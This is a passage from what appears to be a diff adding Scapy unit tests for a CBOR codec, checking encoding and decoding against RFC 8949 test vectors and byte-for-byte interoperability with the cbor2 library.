math.isnan(obj.val) and remainder == b'' + ++ CBOR Integer Encoding - RFC 8949 Test Vectors + += RFC 8949: encode 0 +obj = CBOR_UNSIGNED_INTEGER(0) +bytes(obj) == bytes.fromhex('00') + += RFC 8949: encode 1 +obj = CBOR_UNSIGNED_INTEGER(1) +bytes(obj) == bytes.fromhex('01') + += RFC 8949: encode 10 +obj = CBOR_UNSIGNED_INTEGER(10) +bytes(obj) == bytes.fromhex('0a') + += RFC 8949: encode 23 +obj = CBOR_UNSIGNED_INTEGER(23) +bytes(obj) == bytes.fromhex('17') + += RFC 8949: encode 24 +obj = CBOR_UNSIGNED_INTEGER(24) +bytes(obj) == bytes.fromhex('1818') + += RFC 8949: encode 25 +obj = CBOR_UNSIGNED_INTEGER(25) +bytes(obj) == bytes.fromhex('1819') + += RFC 8949: encode 100 +obj = CBOR_UNSIGNED_INTEGER(100) +bytes(obj) == bytes.fromhex('1864') + += RFC 8949: encode 1000 +obj = CBOR_UNSIGNED_INTEGER(1000) +bytes(obj) == bytes.fromhex('1903e8') + += RFC 8949: encode 1000000 +obj = CBOR_UNSIGNED_INTEGER(1000000) +bytes(obj) == bytes.fromhex('1a000f4240') + += RFC 8949: encode 1000000000000 +obj = CBOR_UNSIGNED_INTEGER(1000000000000) +bytes(obj) == bytes.fromhex('1b000000e8d4a51000') + += RFC 8949: encode 18446744073709551615 (2^64-1) +obj = CBOR_UNSIGNED_INTEGER(18446744073709551615) +bytes(obj) == bytes.fromhex('1bffffffffffffffff') + += RFC 8949: encode -1 +obj = CBOR_NEGATIVE_INTEGER(-1) +bytes(obj) == bytes.fromhex('20') + += RFC 8949: encode -10 +obj = CBOR_NEGATIVE_INTEGER(-10) +bytes(obj) == bytes.fromhex('29') + += RFC 8949: encode -100 +obj = CBOR_NEGATIVE_INTEGER(-100) +bytes(obj) == bytes.fromhex('3863') + += RFC 8949: encode -1000 +obj = CBOR_NEGATIVE_INTEGER(-1000) +bytes(obj) == bytes.fromhex('3903e7') + += RFC 8949: decode 0 +obj, remainder = CBOR_Codecs.CBOR.dec(bytes.fromhex('00')) +obj.val == 0 and remainder == b'' + += RFC 8949: decode 23 +obj, remainder = CBOR_Codecs.CBOR.dec(bytes.fromhex('17')) +obj.val == 23 and remainder == b'' + += RFC 8949: decode 24 +obj, remainder = CBOR_Codecs.CBOR.dec(bytes.fromhex('1818')) +obj.val == 24 and remainder == b'' + += RFC 8949: decode 1000000000000 +obj, remainder = CBOR_Codecs.CBOR.dec(bytes.fromhex('1b000000e8d4a51000')) +obj.val == 1000000000000 and remainder == b'' + += RFC 8949: decode -1000 +obj, remainder = CBOR_Codecs.CBOR.dec(bytes.fromhex('3903e7')) +obj.val == -1000 and remainder == b'' + ++ CBOR Byte String with All Byte Values + += CBOR_BYTE_STRING: encode/decode all 256 byte values +all_bytes = bytes(range(256)) +obj = CBOR_BYTE_STRING(all_bytes) +enc = bytes(obj) +dec, remainder = CBOR_Codecs.CBOR.dec(enc) +dec.val == all_bytes and remainder == b'' + += CBOR_BYTE_STRING: cbor2 interop with all 256 byte values +import cbor2 +all_bytes = bytes(range(256)) +obj = CBOR_BYTE_STRING(all_bytes) +enc = bytes(obj) +dec = cbor2.loads(enc) +dec == all_bytes + ++ CBOR Map with Integer Keys + += Decode map with integer keys (cbor2 encode, Scapy decode) +import cbor2 +enc = cbor2.dumps({1: 'one', 2: 'two', -1: 'minus_one'}) +obj, remainder = CBOR_Codecs.CBOR.dec(enc) +isinstance(obj, CBOR_MAP) and obj.val.get(1) is not None and obj.val[1].val == 'one' and remainder == b'' + += Encode map with integer keys (Scapy encode, cbor2 decode) +from scapy.cbor.cborcodec import CBORcodec_MAP +enc = CBORcodec_MAP.enc({1: 'one', 2: 'two'}) +dec = cbor2.loads(enc) +dec == {1: 'one', 2: 'two'} + += Map with mixed key types roundtrip +enc = cbor2.dumps({'str_key': 42, 1: 'int_key'}) +obj, remainder = CBOR_Codecs.CBOR.dec(enc) +isinstance(obj, CBOR_MAP) and len(obj.val) == 2 and remainder == b'' + ++ CBOR Multiple Items in Stream + += Decode three integers from a single byte stream +data = bytes.fromhex('01') + bytes.fromhex('0a') + bytes.fromhex('17') +obj1, rest1 = CBOR_Codecs.CBOR.dec(data) +obj2, rest2 = CBOR_Codecs.CBOR.dec(rest1) +obj3, rest3 = CBOR_Codecs.CBOR.dec(rest2) +obj1.val == 1 and obj2.val == 10 and obj3.val == 23 and rest3 == b'' + += Decode integer followed by string +data = bytes.fromhex('1864') + bytes.fromhex('626869') +obj1, rest1 = CBOR_Codecs.CBOR.dec(data) +obj2, rest2 = CBOR_Codecs.CBOR.dec(rest1) +obj1.val == 100 and obj2.val == 'hi' and rest2 == b'' + ++ CBOR Nested Structures Unit Tests + += Encode and decode doubly nested array +from scapy.cbor.cborcodec import CBORcodec_ARRAY +enc = CBORcodec_ARRAY.enc([[1, 2], [3, 4], [5, 6]]) +obj, remainder = CBOR_Codecs.CBOR.dec(enc) +isinstance(obj, CBOR_ARRAY) and len(obj.val) == 3 and len(obj.val[0].val) == 2 and remainder == b'' + += Encode and decode map containing arrays +from scapy.cbor.cborcodec import CBORcodec_MAP, CBORcodec_ARRAY +enc = CBORcodec_MAP.enc({'nums': [1, 2, 3], 'strs': ['a', 'b']}) +obj, remainder = CBOR_Codecs.CBOR.dec(enc) +isinstance(obj, CBOR_MAP) and 'nums' in obj.val and isinstance(obj.val['nums'], CBOR_ARRAY) and remainder == b'' + += Encode and decode array containing maps +from scapy.cbor.cborcodec import CBORcodec_ARRAY +enc = CBORcodec_ARRAY.enc([{'id': 1}, {'id': 2}]) +obj, remainder = CBOR_Codecs.CBOR.dec(enc) +isinstance(obj, CBOR_ARRAY) and len(obj.val) == 2 and isinstance(obj.val[0], CBOR_MAP) and remainder == b'' + +########### Extended Interoperability Tests with cbor2 ################ + ++ CBOR Interoperability - RFC 8949 Appendix B (Scapy encode, cbor2 decode) + += RFC 8949 Appendix B: 0 +import cbor2 +obj = CBOR_UNSIGNED_INTEGER(0) +cbor2.loads(bytes(obj)) == 0 + += RFC 8949 Appendix B: 1 +obj = CBOR_UNSIGNED_INTEGER(1) +cbor2.loads(bytes(obj)) == 1 + += RFC 8949 Appendix B: 10 +obj = CBOR_UNSIGNED_INTEGER(10) +cbor2.loads(bytes(obj)) == 10 + += RFC 8949 Appendix B: 23 +obj = CBOR_UNSIGNED_INTEGER(23) +cbor2.loads(bytes(obj)) == 23 + += RFC 8949 Appendix B: 24 +obj = CBOR_UNSIGNED_INTEGER(24) +cbor2.loads(bytes(obj)) == 24 + += RFC 8949 Appendix B: 1000 +obj = CBOR_UNSIGNED_INTEGER(1000) +cbor2.loads(bytes(obj)) == 1000 + += RFC 8949 Appendix B: 1000000000000 +obj = CBOR_UNSIGNED_INTEGER(1000000000000) +cbor2.loads(bytes(obj)) == 1000000000000 + += RFC 8949 Appendix B: 18446744073709551615 (max u64) +obj = CBOR_UNSIGNED_INTEGER(18446744073709551615) +cbor2.loads(bytes(obj)) == 18446744073709551615 + += RFC 8949 Appendix B: -1 +obj = CBOR_NEGATIVE_INTEGER(-1) +cbor2.loads(bytes(obj)) == -1 + += RFC 8949 Appendix B: -1000 +obj = CBOR_NEGATIVE_INTEGER(-1000) +cbor2.loads(bytes(obj)) == -1000 + += RFC 8949 Appendix B: false +obj = CBOR_FALSE() +cbor2.loads(bytes(obj)) is False + += RFC 8949 Appendix B: true +obj = CBOR_TRUE() +cbor2.loads(bytes(obj)) is True + += RFC 8949 Appendix B: null +obj = CBOR_NULL() +cbor2.loads(bytes(obj)) is None + += RFC 8949 Appendix B: undefined +obj = CBOR_UNDEFINED() +decoded = cbor2.loads(bytes(obj)) +from cbor2 import undefined +decoded is undefined + += RFC 8949 Appendix B: empty byte string +obj = CBOR_BYTE_STRING(b'') +cbor2.loads(bytes(obj)) == b'' + += RFC 8949 Appendix B: byte string b'\x01\x02\x03\x04' +obj = CBOR_BYTE_STRING(b'\x01\x02\x03\x04') +cbor2.loads(bytes(obj)) == b'\x01\x02\x03\x04' + += RFC 8949 Appendix B: empty text string +obj = CBOR_TEXT_STRING('') +cbor2.loads(bytes(obj)) == '' + += RFC 8949 Appendix B: 'a' +obj = CBOR_TEXT_STRING('a') +cbor2.loads(bytes(obj)) == 'a' + += RFC 8949 Appendix B: 'IETF' +obj = CBOR_TEXT_STRING('IETF') +cbor2.loads(bytes(obj)) == 'IETF' + += RFC 8949 Appendix B: u00fc (ü) +obj = CBOR_TEXT_STRING('\u00fc') +cbor2.loads(bytes(obj)) == '\u00fc' + += RFC 8949 Appendix B: u6c34 (water in Chinese) +obj = CBOR_TEXT_STRING('\u6c34') +cbor2.loads(bytes(obj)) == '\u6c34' + += RFC 8949 Appendix B: empty array +from scapy.cbor.cborcodec import CBORcodec_ARRAY +enc = CBORcodec_ARRAY.enc([]) +cbor2.loads(enc) == [] + += RFC 8949 Appendix B: [1, 2, 3] +enc = CBORcodec_ARRAY.enc([1, 2, 3]) +cbor2.loads(enc) == [1, 2, 3] + += RFC 8949 Appendix B: [1, [2, 3], [4, 5]] +enc = CBORcodec_ARRAY.enc([1, [2, 3], [4, 5]]) +cbor2.loads(enc) == [1, [2, 3], [4, 5]] + += RFC 8949 Appendix B: empty map +from scapy.cbor.cborcodec import CBORcodec_MAP +enc = CBORcodec_MAP.enc({}) +cbor2.loads(enc) == {} + += RFC 8949 Appendix B: {1: 2, 3: 4} +enc = CBORcodec_MAP.enc({1: 2, 3: 4}) +cbor2.loads(enc) == {1: 2, 3: 4} + += RFC 8949 Appendix B: {"a": 1, "b": [2, 3]} +enc = CBORcodec_MAP.enc({"a": 1, "b": [2, 3]}) +cbor2.loads(enc) == {"a": 1, "b": [2, 3]} + ++ CBOR Interoperability - RFC 8949 Appendix B (cbor2 encode, Scapy decode) + += RFC 8949 Appendix B decode: 0 +import cbor2 +obj, _ = CBOR_Codecs.CBOR.dec(cbor2.dumps(0)) +obj.val == 0 and isinstance(obj, CBOR_UNSIGNED_INTEGER) + += RFC 8949 Appendix B decode: 23 +obj, _ = CBOR_Codecs.CBOR.dec(cbor2.dumps(23)) +obj.val == 23 and isinstance(obj, CBOR_UNSIGNED_INTEGER) + += RFC 8949 Appendix B decode: 24 +obj, _ = CBOR_Codecs.CBOR.dec(cbor2.dumps(24)) +obj.val == 24 and isinstance(obj, CBOR_UNSIGNED_INTEGER) + += RFC 8949 Appendix B decode: -1 +obj, _ = CBOR_Codecs.CBOR.dec(cbor2.dumps(-1)) +obj.val == -1 and isinstance(obj, CBOR_NEGATIVE_INTEGER) + += RFC 8949 Appendix B decode: -1000 +obj, _ = CBOR_Codecs.CBOR.dec(cbor2.dumps(-1000)) +obj.val == -1000 and isinstance(obj, CBOR_NEGATIVE_INTEGER) + += RFC 8949 Appendix B decode: false +obj, _ = CBOR_Codecs.CBOR.dec(cbor2.dumps(False)) +isinstance(obj, CBOR_FALSE) and obj.val is False + += RFC 8949 Appendix B decode: true +obj, _ = CBOR_Codecs.CBOR.dec(cbor2.dumps(True)) +isinstance(obj, CBOR_TRUE) and obj.val is True + += RFC 8949 Appendix B decode: null +obj, _ = CBOR_Codecs.CBOR.dec(cbor2.dumps(None)) +isinstance(obj, CBOR_NULL) and obj.val is None + += RFC 8949 Appendix B decode: empty string +obj, _ = CBOR_Codecs.CBOR.dec(cbor2.dumps('')) +isinstance(obj, CBOR_TEXT_STRING) and obj.val == '' + += RFC 8949 Appendix B decode: 'IETF' +obj, _ = CBOR_Codecs.CBOR.dec(cbor2.dumps('IETF')) +isinstance(obj, CBOR_TEXT_STRING) and obj.val == 'IETF' + += RFC 8949 Appendix B decode: u00fc +obj, _ = CBOR_Codecs.CBOR.dec(cbor2.dumps('\u00fc')) +isinstance(obj, CBOR_TEXT_STRING) and obj.val == '\u00fc' + += RFC 8949 Appendix B decode: b'\x01\x02\x03\x04' +obj, _ = CBOR_Codecs.CBOR.dec(cbor2.dumps(b'\x01\x02\x03\x04')) +isinstance(obj, CBOR_BYTE_STRING) and obj.val == b'\x01\x02\x03\x04' + += RFC 8949 Appendix B decode: [1, 2, 3] +obj, _ = CBOR_Codecs.CBOR.dec(cbor2.dumps([1, 2, 3])) +isinstance(obj, CBOR_ARRAY) and len(obj.val) == 3 and obj.val[0].val == 1 + += RFC 8949 Appendix B decode: [1, [2, 3], [4, 5]] +obj, _ = CBOR_Codecs.CBOR.dec(cbor2.dumps([1, [2, 3], [4, 5]])) +isinstance(obj, CBOR_ARRAY) and len(obj.val) == 3 and isinstance(obj.val[1], CBOR_ARRAY) + += RFC 8949 Appendix B decode: {"a": 1, "b": [2, 3]} +obj, _ = CBOR_Codecs.CBOR.dec(cbor2.dumps({"a": 1, "b": [2, 3]})) +isinstance(obj, CBOR_MAP) and obj.val['a'].val == 1 and isinstance(obj.val['b'], CBOR_ARRAY) + ++ CBOR Interoperability - Byte-exact Comparison + += Scapy and cbor2 produce identical bytes for integer 0 +import cbor2 +bytes(CBOR_UNSIGNED_INTEGER(0)) == cbor2.dumps(0) + += Scapy and cbor2 produce identical bytes for integer 255 +bytes(CBOR_UNSIGNED_INTEGER(255)) == cbor2.dumps(255) + += Scapy and cbor2 produce identical bytes for -1 +bytes(CBOR_NEGATIVE_INTEGER(-1)) == cbor2.dumps(-1) + += Scapy and cbor2 produce identical bytes for -1000 +bytes(CBOR_NEGATIVE_INTEGER(-1000)) == cbor2.dumps(-1000) + += Scapy and cbor2 produce identical bytes for empty byte string +bytes(CBOR_BYTE_STRING(b'')) == cbor2.dumps(b'') + += Scapy and cbor2 produce identical bytes for 'hello' +bytes(CBOR_TEXT_STRING('hello')) == cbor2.dumps('hello') + += Scapy and cbor2 produce identical bytes for true +bytes(CBOR_TRUE()) == cbor2.dumps(True) + += Scapy and cbor2 produce identical bytes for false +bytes(CBOR_FALSE()) == cbor2.dumps(False) + += Scapy and cbor2 produce identical bytes for null +bytes(CBOR_NULL()) == cbor2.dumps(None) + += Scapy and cbor2 produce identical bytes for undefined +from cbor2 import undefined +bytes(CBOR_UNDEFINED()) == cbor2.dumps(undefined) + += Scapy and cbor2 produce identical bytes for empty array +from scapy.cbor.cborcodec import CBORcodec_ARRAY +CBORcodec_ARRAY.enc([]) == cbor2.dumps([]) + += Scapy and cbor2 produce identical bytes for empty map +from scapy.cbor.cborcodec import CBORcodec_MAP +CBORcodec_MAP.enc({}) == cbor2.dumps({}) + += Scapy and cbor2 produce identical bytes for [1, 2, 3] +CBORcodec_ARRAY.enc([1, 2, 3]) == cbor2.dumps([1, 2, 3]) + += Scapy and cbor2 produce identical bytes for {'a': 1} +CBORcodec_MAP.enc({'a': 1}) == cbor2.dumps({'a': 1}) + ++ CBOR Interoperability - Semantic Tags + += Scapy encode semantic tag (tag 42), cbor2 decode +import cbor2 +obj = CBOR_SEMANTIC_TAG((42, CBOR_TEXT_STRING('test-content'))) +enc = bytes(obj) +dec = cbor2.loads(enc) +isinstance(dec, cbor2.CBORTag) and dec.tag == 42 and dec.value == 'test-content' + += cbor2 encode semantic tag (tag 42), Scapy decode +enc = cbor2.dumps(cbor2.CBORTag(42, 'test-content')) +obj, remainder = CBOR_Codecs.CBOR.dec(enc) +isinstance(obj, CBOR_SEMANTIC_TAG) and obj.val[0] == 42 and obj.val[1].val == 'test-content' and remainder == b'' + += Scapy and cbor2 produce identical bytes for semantic tag 42 +import cbor2 +scapy_enc = bytes(CBOR_SEMANTIC_TAG((42, CBOR_TEXT_STRING('test-content')))) +cbor2_enc = cbor2.dumps(cbor2.CBORTag(42, 'test-content')) +scapy_enc == cbor2_enc + += cbor2 encode epoch-based datetime tag (tag 1), Scapy decode +enc = cbor2.dumps(cbor2.CBORTag(1, 1363896240)) +obj, remainder = CBOR_Codecs.CBOR.dec(enc) +isinstance(obj, CBOR_SEMANTIC_TAG) and obj.val[0] == 1 and obj.val[1].val == 1363896240 and remainder == b'' + += cbor2 encode integer-tagged byte string, Scapy decode +enc = cbor2.dumps(cbor2.CBORTag(100, b'\xde\xad\xbe\xef')) +obj, remainder = CBOR_Codecs.CBOR.dec(enc) +isinstance(obj, CBOR_SEMANTIC_TAG) and obj.val[0] == 100 and obj.val[1].val == b'\xde\xad\xbe\xef' and remainder == b'' + ++ CBOR Interoperability - Half-Precision Floats (RFC 8949 vectors) + += Half-precision from RFC 8949: 0.0 +import cbor2 +data = bytes.fromhex('f90000') +obj, _ = CBOR_Codecs.CBOR.dec(data) +isinstance(obj, CBOR_FLOAT) and obj.val == 0.0 + += Half-precision from RFC 8949: 1.0 +data = bytes.fromhex('f93c00') +obj, _ = CBOR_Codecs.CBOR.dec(data) +isinstance(obj, CBOR_FLOAT) and obj.val == 1.0 + += Half-precision from RFC 8949: 1.5 +data = bytes.fromhex('f93e00') +obj, _ = CBOR_Codecs.CBOR.dec(data) +isinstance(obj, CBOR_FLOAT) and obj.val == 1.5 + += Half-precision from RFC 8949: positive infinity +import math +data = bytes.fromhex('f97c00') +obj, _ = CBOR_Codecs.CBOR.dec(data) +isinstance(obj, CBOR_FLOAT) and math.isinf(obj.val) and obj.val > 0 + += Half-precision from RFC 8949: NaN +data = bytes.fromhex('f97e00') +obj, _ = CBOR_Codecs.CBOR.dec(data) +isinstance(obj, CBOR_FLOAT) and math.isnan(obj.val) + += Scapy decode half-precision 1.5 agrees with cbor2 decode of double 1.5 +import cbor2 +half_data = bytes.fromhex('f93e00') +scapy_obj, _ = CBOR_Codecs.CBOR.dec(half_data) +double_data = bytes.fromhex('fb3ff8000000000000') +cbor2_val = cbor2.loads(double_data) +scapy_obj.val == cbor2_val + ++ CBOR Interoperability - Large Integers + += Large uint 18446744073709551615 bytes match cbor2 +import cbor2 +max_u64 = 18446744073709551615 +bytes(CBOR_UNSIGNED_INTEGER(max_u64)) == cbor2.dumps(max_u64) + += Large uint roundtrip Scapy to cbor2 to Scapy +max_u64 = 18446744073709551615 +scapy_enc = bytes(CBOR_UNSIGNED_INTEGER(max_u64)) +cbor2_val = cbor2.loads(scapy_enc) +cbor2_enc = cbor2.dumps(cbor2_val) +scapy_dec, _ = CBOR_Codecs.CBOR.dec(cbor2_enc) +scapy_dec.val == max_u64 + += Large negative int -18446744073709551616 roundtrip via cbor2 +neg_max = -18446744073709551616 +cbor2_enc = cbor2.dumps(neg_max) +scapy_dec, _ = CBOR_Codecs.CBOR.dec(cbor2_enc) +scapy_dec.val == neg_max + ++ CBOR Interoperability - Complex Nested Structures + += cbor2 deeply nested map: 3 levels, Scapy decode +import cbor2 +deep = {"level1": {"level2": {"level3": [1, 2, 3]}}} +enc = cbor2.dumps(deep) +obj, _ = CBOR_Codecs.CBOR.dec(enc) +isinstance(obj, CBOR_MAP) and 'level1' in obj.val + += Scapy deeply nested array, cbor2 decode +from scapy.cbor.cborcodec import CBORcodec_ARRAY +enc = CBORcodec_ARRAY.enc([[1, [2, [3, [4]]]], 5]) +dec = cbor2.loads(enc) +dec == [[1, [2, [3, [4]]]], 5] + += cbor2 complex mixed structure: Scapy decodes it +import cbor2 +data = { + "name": "Alice", + "scores": [100, 95, 87], + "active": True, + "meta": {"created": 12345, "tag": "user"}, +} +enc = cbor2.dumps(data) +obj, _ = CBOR_Codecs.CBOR.dec(enc) +isinstance(obj, CBOR_MAP) and 'name' in obj.val and 'scores' in obj.val + += Scapy encode complex structure, cbor2 decode, values match +from scapy.cbor.cborcodec import CBORcodec_MAP, CBORcodec_ARRAY +enc = CBORcodec_MAP.enc({ + "items": [1, 2, 3], + "count": 3, + "valid": True, +}) +dec = cbor2.loads(enc) +dec["items"] == [1, 2, 3] and dec["count"] == 3 and dec["valid"] is True + +########### CBORF Fields Interoperability Tests with cbor2 ############ + ++ CBORF Fields - Interop: CBORF_ARRAY packet to cbor2 + += CBORF_ARRAY packet to cbor2 list (version info) +import cbor2 +from scapy.cbor.cborfields import CBORF_ARRAY, CBORF_UNSIGNED_INTEGER, CBORF_TEXT_STRING +from scapy.cborpacket import CBOR_Packet + +class VersionInfo(CBOR_Packet): + CBOR_root = CBORF_ARRAY( + CBORF_UNSIGNED_INTEGER('major', 1), + CBORF_UNSIGNED_INTEGER('minor', 2), + CBORF_UNSIGNED_INTEGER('patch', 3), + ) + +pkt = VersionInfo() +raw = bytes(pkt) +dec = cbor2.loads(raw) +isinstance(dec, list) and dec == [1, 2, 3] + += cbor2 list to CBORF_ARRAY packet +import cbor2 +from scapy.cbor.cborfields import CBORF_ARRAY, CBORF_UNSIGNED_INTEGER +from scapy.cborpacket import CBOR_Packet + +class VersionInfo2(CBOR_Packet): + CBOR_root = CBORF_ARRAY( + CBORF_UNSIGNED_INTEGER('major', 0), + CBORF_UNSIGNED_INTEGER('minor', 0), + CBORF_UNSIGNED_INTEGER('patch', 0), + ) + +cbor2_data = cbor2.dumps([4, 5, 6]) +pkt = VersionInfo2(cbor2_data) +pkt.major.val == 4 and pkt.minor.val == 5 and pkt.patch.val == 6 + += CBORF_ARRAY packet roundtrip through cbor2 +import cbor2 +from scapy.cbor.cborfields import CBORF_ARRAY, CBORF_INTEGER, CBORF_TEXT_STRING +from scapy.cborpacket import CBOR_Packet + +class MsgPkt(CBOR_Packet): + CBOR_root = CBORF_ARRAY( + CBORF_INTEGER('code', 200), + CBORF_TEXT_STRING('status', 'ok'), + ) + +pkt = MsgPkt() +raw = bytes(pkt) +cbor2_dec = cbor2.loads(raw) +cbor2_re_enc = cbor2.dumps(cbor2_dec) +pkt2 = MsgPkt(cbor2_re_enc) +pkt2.code.val == 200 and pkt2.status.val == 'ok' + += CBORF_ARRAY with boolean and null fields to cbor2 +import cbor2 +from scapy.cbor.cborfields import CBORF_ARRAY, CBORF_BOOLEAN, CBORF_NULL, CBORF_INTEGER +from scapy.cborpacket import CBOR_Packet + +class FlagPkt(CBOR_Packet): + CBOR_root = CBORF_ARRAY( + CBORF_INTEGER('id', 7), + CBORF_BOOLEAN('active', True), + CBORF_NULL('reserved'), + ) + +pkt = FlagPkt() +raw = bytes(pkt) +dec = cbor2.loads(raw) +dec[0] == 7 and dec[1] is True and dec[2] is None + += cbor2 list with mixed types to CBORF_ARRAY packet +import cbor2 +from scapy.cbor.cborfields import CBORF_ARRAY, CBORF_INTEGER, CBORF_BOOLEAN, CBORF_NULL +from scapy.cborpacket import CBOR_Packet + +class Mixed(CBOR_Packet): + CBOR_root = CBORF_ARRAY( + CBORF_INTEGER('num', 0), + CBORF_BOOLEAN('flag', False), + CBORF_NULL('nval'), + ) + +cbor2_data = cbor2.dumps([42, False, None]) +pkt = Mixed(cbor2_data) +pkt.num.val == 42 + ++ CBORF Fields - Interop: CBORF_MAP packet to cbor2 + += CBORF_MAP packet to cbor2 dict +import cbor2 +from scapy.cbor.cborfields import CBORF_MAP, CBORF_INTEGER, CBORF_TEXT_STRING +from scapy.cborpacket import CBOR_Packet + +class ClaimSet(CBOR_Packet): + CBOR_root = CBORF_MAP( + CBORF_TEXT_STRING('iss', 'scapy'), + CBORF_INTEGER('exp', 9999999), + ) + +pkt = ClaimSet() +raw = bytes(pkt) +dec = cbor2.loads(raw) +isinstance(dec, dict) and dec.get('iss') == 'scapy' and dec.get('exp') == 9999999 + += cbor2 dict to CBORF_MAP packet +import cbor2 +from scapy.cbor.cborfields import CBORF_MAP, CBORF_TEXT_STRING, CBORF_INTEGER +from scapy.cborpacket import CBOR_Packet + +class Claims(CBOR_Packet): + CBOR_root = CBORF_MAP( + CBORF_TEXT_STRING('iss', ''), + CBORF_INTEGER('exp', 0), + ) + +cbor2_data = cbor2.dumps({'iss': 'myapp', 'exp': 12345}) +pkt = Claims(cbor2_data) +pkt.iss.val == 'myapp' and pkt.exp.val == 12345 + += CBORF_MAP packet roundtrip through cbor2 +import cbor2 +from scapy.cbor.cborfields import CBORF_MAP, CBORF_TEXT_STRING, CBORF_BYTE_STRING +from scapy.cborpacket import CBOR_Packet + +class BinHeader(CBOR_Packet): + CBOR_root = CBORF_MAP( + CBORF_TEXT_STRING('alg', 'ES256'), + CBORF_BYTE_STRING('kid', b'\x01\x02\x03\x04'), + ) + +pkt = BinHeader() +raw = bytes(pkt) +cbor2_dec = cbor2.loads(raw) +cbor2_re_enc = cbor2.dumps(cbor2_dec) +pkt2 = BinHeader(cbor2_re_enc) +pkt2.alg.val == 'ES256' and pkt2.kid.val == b'\x01\x02\x03\x04' + += CBORF_MAP with boolean values to cbor2 +import cbor2 +from scapy.cbor.cborfields import CBORF_MAP, CBORF_BOOLEAN, CBORF_INTEGER +from scapy.cborpacket import CBOR_Packet + +class Flags(CBOR_Packet): + CBOR_root = CBORF_MAP( + CBORF_BOOLEAN('enabled', True), + CBORF_INTEGER('count', 5), + ) + +pkt = Flags() +raw = bytes(pkt) +dec = cbor2.loads(raw) +dec.get('enabled') is True and dec.get('count') == 5 + += cbor2 dict with unknown keys: CBORF_MAP skips them +import cbor2 +from scapy.cbor.cborfields import CBORF_MAP, CBORF_TEXT_STRING +from scapy.cborpacket import CBOR_Packet + +class SimpleMap(CBOR_Packet): + CBOR_root = CBORF_MAP( + CBORF_TEXT_STRING('known', 'default'), + ) + +cbor2_data = cbor2.dumps({'known': 'value', 'unknown': 'extra'}) +pkt = SimpleMap(cbor2_data) +pkt.known.val == 'value' + ++ CBORF Fields - Interop: CBORF_ARRAY_OF packet to cbor2 + += CBORF_ARRAY_OF with integer elements to cbor2 +import cbor2 +from scapy.cbor.cborfields import CBORF_ARRAY_OF, CBORF_INTEGER +from scapy.cbor.cbor import CBOR_UNSIGNED_INTEGER +from scapy.cborpacket import CBOR_Packet + +class IntList(CBOR_Packet): + CBOR_root = CBORF_ARRAY_OF('items', [], CBORF_INTEGER) + +pkt = IntList() +pkt.items = [CBOR_UNSIGNED_INTEGER(10), CBOR_UNSIGNED_INTEGER(20), CBOR_UNSIGNED_INTEGER(30)] +raw = bytes(pkt) +dec = cbor2.loads(raw) +isinstance(dec, list) and dec == [10, 20, 30] + += cbor2 list to CBORF_ARRAY_OF +import cbor2 +from scapy.cbor.cborfields import CBORF_ARRAY_OF, CBORF_INTEGER +from scapy.cborpacket import CBOR_Packet + +class IntList2(CBOR_Packet): + CBOR_root = CBORF_ARRAY_OF('items', [], CBORF_INTEGER) + +cbor2_data = cbor2.dumps([100, 200, 300]) +pkt = IntList2(cbor2_data) +len(pkt.items) == 3 and pkt.items[0].val == 100 and pkt.items[2].val == 300 + ++ CBORF Fields - Interop: CBORF_SEMANTIC_TAG to cbor2 + += CBORF_SEMANTIC_TAG packet to cbor2 CBORTag +import cbor2 +from scapy.cbor.cborfields import CBORF_SEMANTIC_TAG, CBORF_UNSIGNED_INTEGER +from scapy.cborpacket import CBOR_Packet + +class TimestampPkt(CBOR_Packet): + CBOR_root = CBORF_SEMANTIC_TAG('tag_info', None, 1, CBORF_UNSIGNED_INTEGER('ts', 1363896240)) + +pkt = TimestampPkt() +raw = bytes(pkt) +import datetime +dec = cbor2.loads(raw) +isinstance(dec, (cbor2.CBORTag, datetime.datetime, datetime.date)) + += cbor2 CBORTag (tag 42) decoded by Scapy CBOR_SEMANTIC_TAG +import cbor2 +enc = cbor2.dumps(cbor2.CBORTag(42, 'tagged-value')) +obj, remainder = CBOR_Codecs.CBOR.dec(enc) +isinstance(obj, CBOR_SEMANTIC_TAG) and obj.val[0] == 42 and obj.val[1].val == 'tagged-value' and remainder == b'' + += CBORF_SEMANTIC_TAG bytes identical to cbor2 CBORTag bytes +import cbor2 +scapy_enc = bytes(CBOR_SEMANTIC_TAG((42, CBOR_TEXT_STRING('tagged-value')))) +cbor2_enc = cbor2.dumps(cbor2.CBORTag(42, 'tagged-value')) +scapy_enc == cbor2_enc + ++ CBORF Fields - Interop: CBORF_UNSIGNED_INTEGER with cbor2 + += CBORF_UNSIGNED_INTEGER boundary values - Scapy encode, cbor2 decode +import cbor2 +from scapy.cbor.cborfields import CBORF_UNSIGNED_INTEGER +from scapy.cborpacket import CBOR_Packet + +class UIntPkt(CBOR_Packet): + CBOR_root = CBORF_UNSIGNED_INTEGER('n', 0) + +results = [] +for val in [0, 23, 24, 255, 256, 65535, 65536, 4294967295, 4294967296, 18446744073709551615]: + pkt = UIntPkt() + pkt.n.val = val + dec = cbor2.loads(bytes(pkt)) + results.append(dec == val) + +all(results) + += CBORF_UNSIGNED_INTEGER boundary values - cbor2 encode, Scapy decode +import cbor2 +from scapy.cbor.cborfields import CBORF_UNSIGNED_INTEGER +from scapy.cborpacket import CBOR_Packet + +class UIntPkt2(CBOR_Packet): + CBOR_root = CBORF_UNSIGNED_INTEGER('n', 0) + +results = [] +for val in [0, 23, 24, 255, 256, 65535, 65536, 4294967295, 4294967296]: + pkt = UIntPkt2(cbor2.dumps(val)) + results.append(pkt.n.val == val) + +all(results) + += CBORF_UNSIGNED_INTEGER byte-exact comparison with cbor2 +import cbor2 +from scapy.cbor.cborfields import CBORF_UNSIGNED_INTEGER +from scapy.cborpacket import CBOR_Packet + +class UIntExact(CBOR_Packet): + CBOR_root = CBORF_UNSIGNED_INTEGER('n', 0) + +results = [] +for val in [0, 1, 10, 23, 24, 255, 256, 65535, 65536, 4294967295]: + pkt = UIntExact() + pkt.n.val = val + results.append(bytes(pkt) == cbor2.dumps(val)) + +all(results) + ++ CBORF Fields - Interop: CBORF_NEGATIVE_INTEGER with cbor2 + += CBORF_NEGATIVE_INTEGER boundary values - Scapy encode, cbor2 decode +import cbor2 +from scapy.cbor.cborfields import CBORF_NEGATIVE_INTEGER +from scapy.cborpacket import CBOR_Packet + +class NIntPkt(CBOR_Packet): + CBOR_root = CBORF_NEGATIVE_INTEGER('n', -1) + +results = [] +for val in [-1, -24, -25, -256, -257, -65536, -65537, -4294967296, -4294967297]: + pkt = NIntPkt() + pkt.n.val = val + dec = cbor2.loads(bytes(pkt)) + results.append(dec == val) + 